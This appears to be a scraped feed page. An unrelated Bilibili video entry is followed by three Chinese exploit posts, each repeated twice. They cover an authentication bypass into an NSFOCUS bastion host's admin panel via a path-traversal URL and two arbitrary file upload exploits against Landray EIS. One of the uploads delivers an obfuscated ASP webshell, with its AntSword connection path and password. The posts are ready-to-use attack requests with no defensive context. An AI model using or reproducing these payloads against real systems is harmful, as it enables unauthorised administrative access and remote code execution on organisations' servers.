【《 一等情事 》-哔哩哔哩】 https://b23.tv/pchGc7Y
Bilibili
《 一等情事 》
简介:不算多特别;更多实用攻略教学,爆笑沙雕集锦,你所不知道的游戏知识,热门游戏视频7*24小时持续更新,尽在哔哩哔哩bilibili 视频播放量 6487537、弹幕量 5262、点赞数 249662、投硬币枚数 314390、收藏人数 178351、转发人数 96120, 视频作者 红泪石戒指, 作者简介 前有无谓,相关视频:《一等情事》ai梅琳娜翻唱+语音告白,油管大佬解包梅琳娜与仿生泪滴删减对话, 梅琳娜太可爱了!,本来二周目准备癫火的,结果都到癫火门口了,梅琳娜那一声哭腔,让我放弃了癫火的念头…
绿盟SAS堡垒机接口登录认证绕过漏洞
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
在目标url末尾加上如下路径访问,页面出现200即说明存在漏洞,在此访问url(不要后面的路径)即可以进去堡垒机admin管理后台
注意浏览器操作需要先访问原始url,不带后面的未授权接口路径,手动选择信任证书,直接点txt里的会告诉你网站不安全
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
在目标url末尾加上如下路径访问,页面出现200即说明存在漏洞,在此访问url(不要后面的路径)即可以进去堡垒机admin管理后台
注意浏览器操作需要先访问原始url,不带后面的未授权接口路径,手动选择信任证书,直接点txt里的会告诉你网站不安全
👍4
蓝凌-EIS frm_form_upload.aspx 接口 前台任意文件上传漏洞
app="Landray-EIS智慧协同平台"
漏洞点:访问 http://xxx/frm/frm_form_upload.aspx
如果访问状态码为200或者500都说明存在漏洞,500是存在漏洞但是没有cookies。访问原始地址抓包请求即可获取前半段cookies,再拼接FIOA_IMG_FOLDER=FI; Lang=zh-cn
拼接完cookies再访问再次访问 /frm/frm_form_upload.aspx页面获取csrf token,这个token填入后面poc的__VIEWSTATE参数
poc:
POST /frm/frm_form_upload.aspx HTTP/1.1
Host:
Cookie: FIOA_IMG_FOLDER=FI; Lang=zh-cn; ASP.NET_SessionId=j……5
Content-Type: multipart/form-data; boundary=4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Length: 2871
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.9582.25 Safari/537.36
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__VIEWSTATE"
步骤3中获取的值
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTTARGET"
GB_SAVE
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTARGUMENT"
保存
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="tpfile"; filename="xnwafhpcm.aspx"
Content-Type: image/png
……
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308--
文件地址:http://xxx/frm/frm_pics/2…….aspx
app="Landray-EIS智慧协同平台"
漏洞点:访问 http://xxx/frm/frm_form_upload.aspx
如果访问状态码为200或者500都说明存在漏洞,500是存在漏洞但是没有cookies。访问原始地址抓包请求即可获取前半段cookies,再拼接FIOA_IMG_FOLDER=FI; Lang=zh-cn
拼接完cookies再访问再次访问 /frm/frm_form_upload.aspx页面获取csrf token,这个token填入后面poc的__VIEWSTATE参数
poc:
POST /frm/frm_form_upload.aspx HTTP/1.1
Host:
Cookie: FIOA_IMG_FOLDER=FI; Lang=zh-cn; ASP.NET_SessionId=j……5
Content-Type: multipart/form-data; boundary=4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Length: 2871
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.9582.25 Safari/537.36
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__VIEWSTATE"
步骤3中获取的值
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTTARGET"
GB_SAVE
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTARGUMENT"
保存
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="tpfile"; filename="xnwafhpcm.aspx"
Content-Type: image/png
……
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308--
文件地址:http://xxx/frm/frm_pics/2…….aspx
👍1
蓝凌EIS任意文件上传漏洞
exp:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 192
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="Oracle.asp"
Content-Type: text/html
<%
<!--
Class C8t6
public property let SXEWH(DlB2YiH48)
exeCute(DlB2YiH48)REM IXMQD)
end property
End Class
Set a= New C8t6
a.SXEWH= request("111")
-->
%>
------WebKitFormBoundaryxdgaqmqu--
蚁剑连接地址:/files/editor_img/xxxx.asp(你上传的文件会被时间戳重命名,不过在response里能看到)
密码:111
exp:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 192
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="Oracle.asp"
Content-Type: text/html
<%
<!--
Class C8t6
public property let SXEWH(DlB2YiH48)
exeCute(DlB2YiH48)REM IXMQD)
end property
End Class
Set a= New C8t6
a.SXEWH= request("111")
-->
%>
------WebKitFormBoundaryxdgaqmqu--
蚁剑连接地址:/files/editor_img/xxxx.asp(你上传的文件会被时间戳重命名,不过在response里能看到)
密码:111
👍4